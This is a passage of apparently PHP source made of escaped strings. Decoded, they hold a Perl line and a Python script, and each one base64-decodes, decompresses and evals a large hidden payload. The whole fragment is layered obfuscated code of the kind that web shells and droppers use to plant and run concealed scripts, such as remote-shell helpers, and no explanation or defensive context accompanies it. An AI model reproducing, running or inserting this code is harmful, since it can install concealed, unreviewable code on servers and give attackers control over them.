"\x75\x73\x65\x20\x4d\111\115\x45\72\72\x42\x61\x73\x65\x36\64\73\165\x73\x65\40\x43\157\155\160\162\145\163\x73\72\x3a\x5a\x6c\151\x62\73\x65\166\x61\x6c\50\103\x6f\155\160\162\145\x73\x73\72\x3a\132\x6c\x69\x62\x3a\x3a\x6d\x65\155\x47\165\156\172\151\x70\x28\144\x65\143\157\144\x65\137\142\x61\163\x65\x36\64\x28\42\110\64\x73\x49\101\101\x41\x41\x41\x41\x41\101\57\66\125\x5a\104\130\146\124\x52\x76\113\x76\x4c\102\x74\x68\x53\122\102\142\x74\x6b\x74\x61\172\x72\112\x63\121\x75\112\x41\x33\151\x55\150\154\x78\152\165\x39\x61\112\147\132\107\154\164\x37\60\117\x57\126\110\62\x51\x70\x4d\x62\71\x37\x54\x65\x7a\165\x37\113\153\x45\x4b\x43\60\171\x55\x4f\122\132\165\x64\x37\132\155\x64\x6d\x6c\x79\x4a\152\65\120\x54\64\x64\104\167\x59\x76\120\x51\171\x39\166\115\x7a\x75\x77\x44\x41\105\121\53\x5a\102\105\x54\145\151\147\x6e\x51\167\x55\61\101\x64\x47\53\127\x54\x52\x4d\166\x58\x2b\x71\x32\x35\151\57\x34\116\117\x41\160\143\121\147\70\x45\143\163\157\106\167\62\x74\141\65\x71\62\71\154\70\145\156\x55\61\x67\165\x57\x74\162\132\65\x4f\104\126\130\x44\112\x45\x76\x69\151\114\127\160\x72\142\x79\x4e\x2b\127\x30\106\163\x67\x42\172\105\x71\65\125\x58\102\x52\x4f\53\x59\x6e\107\x52\x48\170\x61\x70\154\x2f\x4d\64\147\164\125\145\x6b\x46\70\165\x34\65\x76\x44\x4f\x35\x44\x42\x2f\x54\144\x46\156\150\121\x35\x77\x6d\x30\x4e\164\x42\x4b\103\x34\x57\x76\102\x38\152\102\145\70\x49\150\x38\x2f\x6f\172\x76\171\125\63\x42\101\60\115\142\155\166\x68\x4e\x76\130\104\165\x6f\131\x68\123\157\x4b\x46\125\x2b\x35\126\125\x69\x67\x31\111\124\x53\x6c\x54\x49\x4a\53\104\167\x58\126\x6b\66\147\143\x55\70\x47\150\x79\105\x31\x44\101\117\x41\144\x4c\67\57\x4f\x6a\x72\151\164\x51\x4c\105\123\64\x59\x4f\101\x59\65\x75\144\170\62\x73\121\x68\x2f\126\107\x72\x52\x33\x71\152\x56\x6c\x2f\147\x34\154\x74\x50\x77\x49\101\x6f\x4b\62\x62\153\147\156\156\x42\165\132\145\103\x79\71\x64\x68\67\x48\163\150\x4d\x5a\x37\x77\171\101\121\145\x4c\66\141\x45\x7a\53\x46\160\x4b\67\x44\x47\x64\64\153\107\x37\x2f\x44\70\171\117\67\x67\x2b\143\x6b\x4c\121\145\65\160\105\145\x59\70\70\144\x4c\70\x4b\x45\65\130\x68\x31\x37\165\x41\x61\x6b\x32\x50\x6e\165\63\61\x67\x2f\x65\156\105\x33\x47\x5a\x35\120\x70\65\114\x66\x7a\x73\x62\64\150\172\x70\57\105\x57\160\x58\x49\162\x6a\x55\110\x39\x48\131\101\x2b\x44\141\x5a\x78\125\125\125\145\x4f\x6d\x64\131\63\123\x65\x6d\x70\160\154\x38\x37\x6b\150\117\x56\171\x4d\x2f\x2f\116\x32\146\x44\155\x5a\x6e\x6f\64\x6e\162\x39\x38\x63\101\147\x2f\x32\x4f\x36\x47\166\x78\x68\116\x71\162\152\125\x65\142\x51\x55\x42\x30\163\126\x76\60\x38\x76\112\170\146\x48\x5a\x4b\63\x31\152\142\61\x69\x59\146\132\x76\106\53\132\x74\x4c\65\112\107\x43\x36\x63\142\x6c\65\120\104\64\x44\113\x7a\x68\x30\145\64\x39\166\125\57\107\x5a\66\70\x6d\x72\x2f\127\x4e\x61\x57\53\x32\x37\x50\x36\165\x54\x61\104\167\x53\x77\x55\102\x74\146\x56\x32\x57\x2b\x39\157\x50\x66\164\106\x79\104\x50\115\162\x69\x77\112\x65\127\65\131\127\170\122\114\x36\x41\120\x4f\x66\x51\x30\141\x73\166\122\x6c\110\x43\103\126\150\x74\150\130\166\x65\x73\x6d\x47\104\x52\167\125\x7a\x66\x43\x66\65\x2f\150\x54\x32\x53\x56\x79\x30\x6a\x78\167\x64\132\x4b\131\x72\61\x38\57\x5a\116\153\147\153\x4b\172\101\112\x56\x48\141\63\60\117\x75\x77\53\126\x52\156\x75\x49\x51\x4b\160\x59\101\x48\144\x63\170\x72\x78\x33\130\x49\161\x32\165\x4c\121\x6b\x6b\x2f\x69\x39\62\160\x64\x67\124\123\x31\x72\143\x52\x2b\x57\x49\121\x79\70\x41\60\x6e\x6b\71\107\x31\154\151\143\141\166\64\x5a\x55\57\146\x51\162\x4f\x4b\x51\x45\123\x2f\63\63\156\161\132\x41\x6f\126\x4b\x77\166\x41\x58\x66\104\166\126\106\x4b\x51\x42\x59\161\x42\x53\101\x54\154\x59\x6e\x69\x44\126\153\x59\67\x34\x32\x47\x57\60\x7a\172\163\x77\102\x6f\70\x4b\127\x5a\121\x73\x55\164\x37\155\x4f\152\x30\x7a\x47\164\170\120\115\x2f\x47\164\123\x6e\165\62\x54\112\x62\x67\62\164\132\x35\x72\x57\x67\147\154\104\125\x4a\x4b\x77\106\x53\x6a\163\x44\141\131\130\127\67\70\121\53\x61\143\x43\61\x79\157\104\102\151\131\x79\x7a\x31\x2f\x43\102\x7a\107\66\x70\116\115\150\62\147\66\101\115\126\x6b\x72\x34\x39\171\156\106\147\110\170\x52\x6d\x30\130\x56\x5a\167\143\171\x51\155\x78\x64\x30\x6e\x66\126\105\x5a\53\x56\x38\x6b\146\116\x4b\x55\x44\132\144\x44\x74\x55\164\x7a\146\x52\x73\104\x6d\120\107\112\121\x76\x73\160\126\x4c\x4b\132\x31\x54\x47\130\61\102\157\x76\106\x32\171\123\115\166\x51\104\x4c\71\144\160\x66\170\157\155\x68\124\x62\x77\x55\103\165\101\132\x42\115\163\125\63\x47\157\x41\144\116\150\x42\153\141\131\163\171\x67\71\x35\141\x71\112\53\x4b\x2b\166\x4b\x64\126\63\x72\107\x76\141\x34\x4e\x6b\155\x39\113\x4a\165\x7a\106\112\155\x4a\164\x55\146\x47\61\x58\166\x72\x76\x65\x74\145\120\x7a\x47\61\122\63\x61\144\x45\123\161\150\x36\x68\x2f\x75\x47\162\x57\105\x68\112\146\70\104\x35\124\104\157\71\171\x41\112\106\x31\x67\115\x32\150\155\164\x45\153\x73\161\117\x6e\x39\x5a\x79\x59\127\x6c\124\x68\150\x6b\146\110\x32\57\117\124\116\x2f\165\x48\122\70\x63\x6c\x34\154\x39\102\122\124\x51\167\x31\x7a\x66\127\115\122\66\x73\x34\x59\x44\125\153\131\x5a\141\163\x70\156\x61\123\147\x69\x42\x53\162\132\106\67\x77\155\x77\57\152\x4c\x4d\x47\x73\x53\113\150\x70\x62\x45\x73\x49\120\x65\x31\57\57\x66\114\152\x68\164\122\150\x61\150\x50\x6c\157\x77\x67\x51\60\114\x31\172\153\172\x31\x77\64\141\130\117\172\157\x6c\x4e\x31\65\107\x43\150\105\112\64\112\x63\x56\x76\163\53\x79\142\x46\x36\x45\x34\x56\61\x48\154\x38\155\160\160\102\x35\x35\x71\102\x72\60\155\153\146\x55\154\x76\x45\x37\170\x77\125\x55\162\x51\x49\112\71\x59\x71\163\x4e\x53\170\142\x57\x4a\127\107\120\x73\123\113\x70\141\117\150\x41\115\x51\x52\125\113\170\x34\67\x74\102\x38\171\142\117\x4f\57\117\147\105\x50\x50\x4e\x6d\167\116\130\112\60\64\x4c\x5a\131\151\130\157\x51\x49\x59\x55\x7a\x4a\x6e\154\x73\x57\x63\125\105\x63\164\x38\x4c\x32\105\107\x69\63\x7a\x77\x35\x4e\x75\x4c\131\53\151\x31\123\x52\x77\x42\x5a\66\x4f\x4f\142\x55\x4b\141\x55\x51\112\x49\x2b\126\63\x43\110\114\157\164\157\154\125\x4e\x70\127\124\x46\70\x6d\x55\143\117\x4c\112\143\105\70\57\x48\110\x75\x32\101\131\x37\x52\114\120\53\x56\112\146\x67\112\71\103\x55\x48\x67\x6b\x74\x45\x77\x39\107\x59\163\x4a\105\x44\163\x55\x4f\x57\141\x46\113\x42\x5a\64\153\127\x45\x41\x34\166\160\x64\111\x36\x75\114\x42\111\x41\127\x67\x67\x64\x6b\127\x47\127\160\x33\107\x30\x47\114\x57\151\x57\x5a\142\131\x38\x6e\155\167\152\103\107\x43\x78\102\115\x78\x41\x45\x53\x4a\115\x62\121\105\71\x39\x47\x51\x52\172\147\116\x5a\x50\154\x64\103\x43\x71\104\112\x35\114\121\165\170\x74\x45\x59\x42\171\131\147\x6c\113\62\153\x73\x46\x35\x2f\164\113\x4c\x46\x6f\147\x57\x2b\70\x55\x4b\x72\x4f\71\101\102\115\143\x68\x77\71\145\x58\144\x38\x65\x42\x34\145\160\142\156\126\172\x64\x37\120\x41\157\131\x75\x6e\162\x79\x65\155\112\x49\67\x79\x45\x38\x72\117\162\x37\x6e\126\110\x44\105\x53\x55\123\x43\x38\x68\154\x42\x4a\122\107\x75\155\x63\x6b\x67\x7a\171\170\66\x45\57\x37\144\106\123\x4d\x37\x6b\151\x49\61\x58\x53\154\x46\x38\171\122\153\162\x46\x4c\131\130\105\x57\146\111\x67\x59\106\110\112\117\x64\147\x69\x67\66\165\x72\x48\x53\x7a\143\x2f\x48\x55\x71\x37\60\163\x52\111\x70\142\x77\122\66\127\126\x4c\x68\x72\x37\106\x4b\167\123\124\124\150\x6c\x65\x5a\106\107\x6f\x67\x33\152\x43\x78\x46\x70\x61\116\x63\x54\x57\x45\107\x71\x7a\x44\x33\x33\106\153\x78\x32\x70\162\125\x32\x46\x76\x6b\x56\126\120\157\x31\66\64\x33\x39\105\x49\x4a\x6f\x44\106\146\x76\x76\x66\131\x66\53\53\x33\57\x64\144\166\x2f\x75\152\x59\164\57\x62\x48\x65\113\123\112\x5a\115\x46\x38\x2f\x6f\142\164\x51\114\x43\62\x32\113\120\146\x74\121\x51\x79\x61\x52\x33\x6b\x62\x44\122\66\x51\x6e\x4e\x33\x6d\x31\152\x4a\146\x68\x64\x68\x51\164\154\x74\x32\151\x4a\104\122\143\x41\x6c\66\x6a\131\x59\x35\x7a\x30\115\62\x4f\x6b\104\102\x5a\x48\132\x48\71\153\53\117\x39\x73\155\x45\x37\x5a\x2b\x53\x4e\152\154\x34\144\x55\172\117\127\x52\157\x4f\114\131\153\60\x46\x48\x6b\x30\145\x72\x4b\x47\103\x54\123\105\x45\x69\167\x54\x61\142\117\x7a\124\131\x76\61\110\x50\x79\131\x44\x30\152\113\106\70\x76\143\x6a\x6a\x2b\170\x46\101\x41\63\x41\53\154\62\x32\64\57\104\x4f\x42\63\163\x39\120\x66\x6d\70\x32\x37\130\166\x75\x46\102\x76\x68\x7a\60\156\x6e\127\x54\127\x37\x74\115\124\103\151\x4c\171\114\143\71\147\x36\110\x74\157\x34\x33\113\x74\x37\x64\115\103\101\164\x44\156\155\x51\x38\x73\62\x2b\127\x50\107\144\x74\62\102\x49\x2b\127\102\x6a\x46\116\x36\155\x58\62\102\165\x52\x37\x2b\x73\x56\x6c\x42\x30\x65\164\131\130\70\x41\132\x52\122\x34\x41\63\60\117\131\144\170\163\x4f\62\x46\x66\x42\x45\x4e\x79\101\x71\125\103\x5a\153\71\151\61\115\111\103\x75\101\153\x74\x79\123\x4c\121\170\x34\x51\113\110\130\x32\x44\x4c\x79\x36\123\x48\107\x6d\x41\144\71\x68\102\131\x51\116\104\164\x34\105\67\x4e\164\x32\x74\x76\x51\x43\61\113\x4d\x4c\x76\70\x2b\101\141\161\x63\67\57\161\156\x37\x62\106\71\x78\x61\161\x64\145\167\x49\x74\163\147\x45\166\113\x4e\164\x4c\x66\121\167\126\x2b\170\x41\x79\57\123\x44\x50\x77\x45\x55\154\151\x6a\x67\156\x34\106\143\x64\111\x59\x34\x6e\x63\x36\x2b\x75\x36\x7a\x6d\151\x44\x69\x6b\110\111\x35\156\x6d\x70\123\105\71\64\131\x69\117\x32\x77\160\130\131\103\156\113\x50\x58\x61\53\x56\167\106\x4a\x65\156\132\143\x49\x37\163\116\x75\153\x70\x45\x6b\x63\x59\x6f\x46\x34\x79\105\110\x62\x48\x62\70\x56\x62\x44\53\127\71\x78\x4b\63\x2f\x32\103\113\x6a\x38\x51\x7a\x77\145\153\x4a\126\64\x51\70\107\x6a\122\x56\x6b\x37\113\x63\161\x6a\113\x41\67\114\x33\x35\121\160\x44\x54\122\103\53\x77\x61\x42\101\141\104\63\x59\x79\x6c\x69\x54\154\110\x36\116\x76\113\65\160\130\61\x4f\53\x46\106\172\124\x70\127\67\120\x7a\x70\110\x34\113\121\x55\120\x65\x6a\70\104\155\x6b\162\x38\x76\x65\x66\x2b\63\164\67\172\115\166\x47\x37\63\x63\x66\126\x44\x76\x47\113\x50\x4c\131\x33\x57\114\x35\x78\x67\167\60\164\165\124\x56\x6e\x4f\120\63\107\x45\144\x61\x6d\x62\x31\x56\154\x63\104\x58\127\x34\x7a\x6b\x67\132\101\142\62\x71\116\154\103\123\110\124\x6f\124\x6c\146\x38\x51\107\x47\116\105\53\154\x4b\x68\x38\111\x58\x70\153\142\x74\x55\x37\x34\x4b\164\x57\x72\146\123\x34\132\117\x46\167\102\x30\x46\152\103\x54\x70\x6b\107\x56\x72\x4a\x6f\165\126\x42\115\154\103\x67\112\112\122\x31\x64\x6b\117\x4b\x74\113\x43\x58\151\x45\153\143\167\114\x53\x41\x76\123\x39\170\120\120\117\x48\x52\150\70\161\143\x41\x71\66\70\x58\151\x78\x55\60\x2f\x49\64\x66\162\64\142\x57\x62\x45\x53\165\x73\146\65\107\x65\x56\126\57\150\x7a\x6c\x32\142\151\114\x64\x37\x4e\101\x65\104\102\112\123\x53\57\x51\145\112\124\x37\163\x4a\x64\167\x2f\64\x47\151\x68\x4a\x33\x34\162\x78\172\165\60\x44\x34\x72\155\171\103\112\157\105\103\x6d\x74\x35\67\104\x72\x48\x50\161\x4f\x70\x59\x45\130\145\x57\x56\x66\121\150\112\121\157\x32\110\130\x54\x72\x38\x2f\67\x76\145\x66\151\65\130\114\123\x6e\116\x79\x73\x4f\103\161\116\x73\x35\x47\123\x6d\60\103\x74\124\x65\x43\x38\x79\170\x59\x6e\x38\x63\x45\155\x7a\x35\x4c\x49\x63\x41\64\x42\110\126\x30\x69\132\x63\110\53\115\104\107\x30\155\167\x52\x52\63\105\115\71\x70\x5a\x54\153\116\112\67\122\104\165\x74\x42\x38\x59\x66\131\x39\165\110\x4f\x72\x54\x69\103\101\57\x30\106\146\x7a\106\x72\x4d\105\125\167\150\x70\120\x61\63\114\125\x44\x63\111\112\x4a\120\147\x78\x46\147\114\153\164\x64\142\117\125\x78\150\62\70\x45\122\130\x6e\x62\x39\x72\120\x57\154\105\x78\102\x45\143\64\x69\x72\155\105\x6a\154\x48\66\103\161\x66\165\x7a\57\x39\x41\151\x36\61\x64\144\102\x7a\145\x39\127\101\113\157\154\x68\x35\x63\x58\x33\x4b\107\162\x4f\x6f\144\127\x41\x38\171\126\x4e\146\172\x5a\x6e\x76\x54\x32\x67\x71\x61\154\126\64\x6c\53\67\x47\x71\106\62\116\x51\62\151\115\62\131\x2f\x50\101\x33\113\154\145\127\71\112\145\x6a\x38\x6a\126\x57\x59\x6c\x68\x78\130\130\x38\112\x4f\x57\172\x64\x6d\x53\106\145\x48\123\x4b\165\67\156\x6f\67\165\x36\150\x75\x78\66\166\57\121\150\117\x6c\x58\105\53\131\x2f\156\125\53\63\x6f\x39\x61\120\152\113\112\57\x61\67\111\103\x67\x45\x77\145\123\117\x34\x36\101\x36\x77\127\x4a\x62\x6b\166\160\x30\x79\157\x55\x4e\166\x5a\x72\x2f\163\x58\132\x7a\112\146\x70\165\x73\x39\67\x48\x49\62\142\x4d\66\x4e\151\155\x51\x30\157\x6f\63\132\x57\104\x36\x2f\x53\x37\53\x55\123\153\132\151\x42\147\x36\x35\x2f\71\x47\150\x45\x48\x77\57\x6a\x75\131\143\144\160\x75\162\x37\66\145\115\63\x4d\x55\x46\156\x46\x76\x67\65\x56\144\111\x41\x4a\x55\x42\121\103\x51\123\x51\x6b\x36\101\122\x41\x32\x46\143\167\x38\53\67\x4b\x31\117\x72\x32\115\64\x70\61\127\104\112\x57\124\x6f\x50\x78\157\161\155\71\x65\101\x61\x2b\x44\x30\x53\x47\65\x63\x63\x2b\x32\x46\110\161\152\142\x4e\141\x74\112\x55\113\101\123\144\165\163\172\x68\x69\126\x35\65\x64\x33\x79\x56\142\x45\151\x4f\x52\x43\124\x47\x4d\x36\111\x58\x37\154\x54\x7a\102\x6a\131\x48\150\151\132\x57\132\x37\x42\170\162\146\x4d\114\x33\x4a\127\115\x6c\x78\x76\127\164\x73\x72\117\120\x74\145\117\155\x31\x76\x75\x43\x34\x50\114\x6f\x37\x50\x4a\x39\117\x7a\57\144\115\170\110\104\116\x72\x75\x37\63\x43\107\x46\x2b\70\107\61\x39\x73\x4d\x5a\x71\156\x61\61\112\x65\170\71\x69\x61\x54\x4e\x30\123\150\111\x64\127\67\x61\113\x49\123\x6d\x55\x63\x45\x6a\104\143\x46\x74\117\132\165\x4a\x79\126\160\62\153\x66\x72\70\103\60\x78\161\104\x39\x41\106\141\101\127\x50\112\123\157\111\110\66\x51\x56\x31\x75\x66\x73\x43\124\x64\x47\115\116\64\60\x58\x46\167\142\x79\x68\x41\x6c\x34\x54\166\110\145\x7a\112\63\x37\147\x5a\153\57\170\170\147\153\x76\172\62\103\167\147\102\117\151\x76\x4f\x37\65\114\x6f\106\x39\x6e\60\114\x47\x76\x33\154\106\x71\x69\65\157\117\172\127\x6f\166\x64\110\x65\150\x4d\105\104\122\64\x6e\x4b\x50\144\121\x50\151\x46\x75\166\66\x53\66\x46\66\x71\164\x59\x34\141\x4b\x53\x57\x77\107\126\x2b\x56\x39\170\152\127\124\x38\167\142\121\x33\x72\x58\163\x6e\110\114\171\57\167\130\166\146\x76\71\x52\x52\x74\150\63\104\146\126\106\120\152\150\161\155\114\117\67\63\127\165\x49\167\x34\x4a\x2f\113\x42\161\107\x47\x51\x35\170\x6d\x42\x6e\60\143\x78\x2f\x53\122\107\x44\53\153\65\x59\117\110\x75\157\155\141\115\125\x55\x44\x71\147\113\x79\142\125\103\x79\x53\131\x4f\111\60\124\x44\x35\x74\161\x6a\x47\131\x46\x6f\x4b\114\64\x64\x4b\x6b\x73\131\63\155\x61\x50\63\x75\172\x72\x4a\105\160\x68\112\57\103\127\x44\157\161\x4b\x4c\x79\147\103\x69\122\x54\x71\157\x72\115\x61\x4d\x55\161\144\120\x63\71\62\x71\x4c\x71\x76\x4b\102\x50\151\x4c\x63\x61\167\x62\125\60\53\x50\x65\156\x33\121\x4c\x6f\71\x66\x72\x66\130\71\153\x34\x74\124\x63\121\x33\161\164\160\x72\142\x33\65\x62\x31\64\x79\x74\106\121\144\60\x6f\146\x2f\x45\x66\x44\x63\104\x32\x73\71\117\x72\x38\x67\x33\x76\66\x63\x68\156\141\x6f\x75\114\113\x77\127\125\155\x4c\x76\142\145\x6d\x50\151\x30\123\144\153\x78\x72\103\170\120\147\x4a\127\x55\63\x58\x67\170\x52\166\121\61\111\x31\115\166\x45\61\x56\103\141\102\116\x38\121\103\x37\x41\127\156\144\x52\156\107\163\x4d\154\x4a\157\x2b\x47\x55\x31\63\107\172\x4b\106\x4c\114\113\x2b\112\121\x78\164\x70\114\141\x53\x45\x62\164\61\154\x66\x48\x4a\x4c\x74\x31\x62\61\x4b\x7a\x2f\167\70\x77\142\154\x53\x2b\x46\x52\x6f\x41\x41\x41\75\75\x22\x29\x29\51\x3b"; $py = "\43\41\57\165\163\x72\57\x62\x69\156\57\160\171\x74\x68\x6f\156" . "\12\151\155\x70\x6f\162\x74\40\172\x6c\151\142\54\40\142\141\x73\x65\66\x34\12" . "\x65\x76\x61\154\50\143\157\x6d\160\x69\154\x65\x28\172\x6c\x69\x62\x2e\144\x65\x63\157\155\x70\162\145\163\163\50\x62\141\163\145\66\x34\56\142\x36\64\144\x65\143\x6f\x64\x65\x28\42\x65\x4a\171\154\x46\x39\164\x79\62\x7a\142\x32\62\146\x6f\113\x44\114\170\x62\125\161\x75\x72\x46\124\166\116\66\x4e\x61\x36\130\161\146\x31\x62\x4e\x4e\x6d\x45\162\x63\x76\x74\153\143\104\x45\161\103\x49\x43\121\154\167\121\x64\x43\62\x36\166\106\53\53\65\64\104\x6b\102\x4c\x56\141\117\x4f\62\141\70\x2f\x59\102\115\67\x39\x66\x6d\x44\116\132\164\157\x35\153\x6e\155\x68\x6a\123\130\170\x57\x74\x70\x6f\65\x76\70\x4e\150\127\112\122\112\x73\x4a\165\122\172\x7a\107\x6f\162\103\x41\126\142\x43\171\67\116\123\157\x35\141\x62\163\x41\x31\65\x66\154\x2f\62\x31\163\101\152\x70\122\x36\x77\x55\162\x30\57\x37\x6c\x63\x6b\171\107\130\x55\123\157\63\116\x69\132\123\65\111\121\x32\106\x4e\x67\165\x65\x47\x67\172\x55\x73\106\x68\x47\114\x50\63\156\125\x6a\71\x5a\111\x74\142\67\66\x75\x55\x46\x76\172\152\x57\152\102\x72\x6b\102\106\167\x43\x31\x4b\x31\103\164\x49\x78\117\151\x53\x39\104\x32\130\150\161\164\x68\151\153\x72\126\x35\57\105\x4a\161\121\x66\x4c\172\65\143\x76\142\x39\x65\57\130\124\53\67\x70\112\x32\x51\146\153\171\x4e\x72\x4b\x77\x69\157\106\103\x69\x78\142\102\172\122\x37\x69\x58\x55\x64\153\160\146\147\x39\x4e\x71\x55\144\x4c\x68\114\103\x73\157\x52\144\x35\x44\x79\115\x6b\144\61\122\x6e\x4d\161\x4d\162\60\162\114\160\145\x71\124\x37\x55\x46\x58\x31\162\x4d\166\x64\x43\110\125\x42\x48\104\63\125\131\x64\x78\160\153\164\60\66\x74\x47\122\x45\127\x57\x56\111\x58\x61\x62\145\x47\147\x45\64\x2b\105\145\x45\x64\66\62\x71\127\x78\154\x46\120\110\x45\x6e\x55\123\x62\110\x44\x6d\163\65\146\103\164\x46\x42\156\57\x61\114\126\150\x61\x38\x53\x4d\143\167\x34\101\150\101\x38\150\x50\x76\x63\x73\x71\60\121\131\170\x45\107\63\167\66\130\x35\110\x4d\101\x42\x41\x48\64\x45\x49\x6a\104\x4e\x6b\x2f\x6f\x77\104\x69\166\x31\x37\60\x70\142\x45\x66\x72\x67\x44\x71\x50\x58\x70\61\172\x45\155\x6f\163\x51\163\x4c\161\117\x43\102\147\103\153\x57\x66\67\105\x68\x46\x67\x64\126\x75\123\x2f\115\146\116\145\120\x72\x71\152\x69\x77\127\112\111\147\65\x43\144\x43\63\x79\161\166\x67\x7a\161\x53\x48\105\x75\102\166\x4d\115\x4e\166\150\x4f\102\x33\70\x63\101\x44\167\114\171\x6f\152\102\110\113\57\164\116\x4a\x62\x77\113\x45\x35\106\63\x77\x5a\112\106\x42\x30\x6f\124\102\162\x51\x72\x36\x67\x54\144\x51\x61\x65\x75\64\x4d\121\x57\x63\x64\67\x53\x42\x41\x30\150\106\115\x68\62\x7a\x72\101\167\x78\167\101\143\x35\102\x79\152\62\101\117\x73\x36\x61\x30\x44\x43\x43\61\x7a\x33\62\x59\x49\161\x48\x59\152\x64\171\152\163\x50\163\64\142\x5a\144\115\x69\151\105\166\x2b\x48\x64\x45\151\67\x6e\x66\145\x51\57\x51\x56\x6d\x53\130\x42\104\65\156\103\166\x6f\111\64\x32\155\x56\152\121\x57\x47\x66\141\124\x49\x2f\x48\162\67\64\x2b\x47\x59\x39\x6e\x64\x42\156\x30\66\152\162\x45\163\106\141\154\115\x47\x47\x33\106\70\170\110\x53\x4c\x4c\x38\71\147\130\x4b\x76\130\x4b\x34\57\120\x44\162\x35\x59\145\x36\110\x4c\131\x63\x44\x73\x71\x65\122\x49\153\64\x4f\x58\x4d\x63\144\155\x62\164\123\x4f\67\x2b\x46\x71\x44\x50\x56\171\x73\x73\x6f\71\130\113\122\x58\151\61\x79\160\x6c\x55\161\170\127\x47\62\x5a\x55\x77\157\x52\x64\141\127\x53\101\x64\62\x45\x30\150\x70\163\x53\x4b\122\172\164\113\142\132\x37\144\155\154\164\x46\x47\66\122\147\x6a\x6c\146\114\145\x51\x72\126\163\x5a\170\x62\141\x54\x4f\170\x76\x49\x43\105\x34\x69\x54\141\153\120\x4d\x66\63\65\x36\124\x61\x33\110\53\152\147\x7a\x49\x78\146\x64\x58\65\120\63\x47\160\154\162\x4e\x52\x78\x35\164\x6e\x67\x76\x4c\157\115\141\x59\113\131\x56\144\60\106\53\165\63\x77\x37\x65\60\117\130\x63\x57\142\x4c\x38\x78\170\x4e\x55\126\171\x61\126\x6d\103\161\164\x78\x4f\x7a\x35\145\x4c\x56\113\125\116\x75\x71\145\x45\x6f\x79\x7a\145\x79\x55\107\114\x6c\x4f\x37\125\172\146\x43\x77\115\130\104\x31\x4f\123\123\163\66\x46\155\156\153\120\x6b\x4f\120\x4a\x57\132\113\x41\105\170\70\x6b\x74\53\x6d\125\x6e\x4a\x79\x4f\x69\70\x63\x5a\154\171\x57\153\x78\62\131\113\157\125\x66\127\147\x77\x6a\151\57\62\155\107\x68\147\61\62\x66\x41\121\x55\x53\154\110\113\143\x76\141\121\x53\x69\x73\x47\64\114\105\x59\x72\x46\x66\66\x77\x62\102\151\x39\160\x79\x78\x53\107\122\x50\x4f\124\x4e\162\161\x51\x5a\x4f\102\127\x43\117\166\x49\110\x65\x53\x73\151\155\x41\143\x76\153\x57\153\x31\112\104\165\160\153\x59\x68\132\x70\x77\x77\x58\157\143\x31\x49\x38\x6b\x6c\112\x6e\x6b\153\x4f\104\64\104\120\163\x6c\62\165\152\113\x38\x57\156\x32\x45\101\x56\x43\115\105\x67\x41\146\142\x6a\x6f\x45\x77\132\122\172\63\x47\70\110\163\x4b\126\115\146\x6a\171\61\146\x6a\60\57\117\141\60\70\x41\167\114\161\x74\x79\151\161\104\x47\x75\x4d\x6b\x5a\113\166\x42\156\172\111\147\x72\x55\x36\113\130\103\147\60\x78\x46\117\132\57\x4f\x4d\131\x62\x69\53\x4e\x42\x71\57\126\124\x57\x32\145\x30\x6f\x51\65\104\x4a\150\x4b\67\71\142\114\172\170\114\116\125\122\x57\126\x76\x4d\107\x73\x57\132\x52\130\x6c\x30\x74\x34\x39\61\121\x49\142\145\x57\x31\x65\114\x72\x36\110\x33\126\124\x48\x45\152\x71\156\x57\157\x74\x44\104\156\147\53\150\157\142\171\x39\112\145\64\116\x62\67\x37\107\x6c\125\x2b\105\115\x38\104\60\147\162\x47\x59\x56\x43\163\102\x37\x57\x54\x53\x73\x73\115\x59\x4a\71\71\104\x68\107\157\x43\x64\64\x2f\x59\61\x41\x67\x74\x4f\x77\112\x78\157\114\x38\x54\144\124\66\67\141\126\x32\x53\x2f\165\x57\x38\157\63\147\x6c\151\x35\x74\145\x34\x37\x66\x75\160\71\107\70\120\x54\x6b\116\x61\104\x56\170\x58\x2f\62\112\x6a\64\x37\145\61\115\x62\x43\111\x33\x6b\67\67\163\151\131\132\130\x56\163\62\144\157\101\x36\67\107\x35\151\x4e\146\164\132\x48\x6d\x47\x36\x49\x56\170\112\115\166\113\116\144\170\154\125\x4d\165\131\x72\x4f\x36\x7a\101\122\53\x66\162\x65\x35\x34\x75\x46\x74\101\x4b\66\x2b\150\x52\141\x62\101\x41\113\60\x7a\102\x6b\x6c\x30\144\x70\112\x58\116\104\x6a\x73\x66\165\150\x78\x4f\x72\x43\165\x33\x4a\x42\x34\x59\123\160\x30\x54\162\x36\124\x36\144\127\x36\65\167\113\144\114\161\67\121\107\143\x42\x4d\62\70\141\144\111\x4a\x59\131\114\x49\163\x35\x77\156\60\x49\126\x4b\x4c\x67\x6b\x44\x53\x4a\x54\124\x63\141\116\x64\x6c\167\103\117\103\154\111\171\124\x72\171\x42\71\67\x32\x55\160\131\x54\x6b\x69\57\63\x48\x58\x39\145\x6e\x62\x4e\x66\x53\x32\x62\102\x6a\162\146\x44\x36\113\157\120\63\x4e\x52\x38\147\123\x37\107\x38\153\x57\106\171\x6f\x69\x48\146\x7a\147\x70\x35\121\x55\x6d\x75\112\x33\161\x4d\153\150\154\x72\103\x2b\147\106\x48\117\x7a\x33\x78\130\104\164\53\x51\123\x65\147\161\x45\x55\x57\57\x49\101\x2f\62\x6d\x78\x71\x4f\170\113\x6f\x77\167\130\x39\x56\x52\x6a\x4f\x46\x4b\x4d\x45\x73\x38\x49\x7a\101\143\130\x32\114\x44\x32\145\x54\x43\x34\x6e\x6b\x7a\x63\x4f\70\156\106\x6e\103\x37\154\x59\x79\x32\60\x6a\x6a\132\x61\61\113\x51\x52\66\x74\x52\x4b\170\x42\131\x39\x59\124\126\x36\131\107\60\150\154\117\x66\64\x78\152\x65\67\114\x6f\x4a\x6e\x35\122\x4a\142\153\112\70\150\x44\164\x30\x6d\65\x59\125\x39\x62\x7a\132\x37\114\53\x32\x62\125\x31\104\127\x44\121\132\65\x4f\115\x45\x75\144\160\x68\143\x36\172\x33\107\x47\x54\x77\x2f\x4e\160\142\x72\x30\131\x43\x7a\61\125\126\123\146\x4e\x42\x50\112\66\167\124\115\x6c\57\116\x69\53\x55\125\x68\145\65\x58\x61\x69\x47\62\x71\152\x42\152\x39\125\x49\111\x33\x77\146\x4e\154\101\x55\x47\x4b\125\170\106\57\x57\164\x41\x45\132\x72\x79\x67\164\131\x6c\102\111\x6a\115\x52\x34\120\104\x48\x54\x51\x75\x74\164\x47\67\122\120\152\x70\x43\x51\111\x4b\67\127\162\x32\x46\x33\x58\x6a\125\117\64\x54\126\x47\167\x71\x45\121\x45\110\132\113\x39\x67\x77\164\x74\x68\x39\153\163\x6e\x53\x75\150\x58\151\151\x4a\101\62\x6b\x35\x76\164\x34\x61\x37\x6a\102\107\x6a\x6a\64\11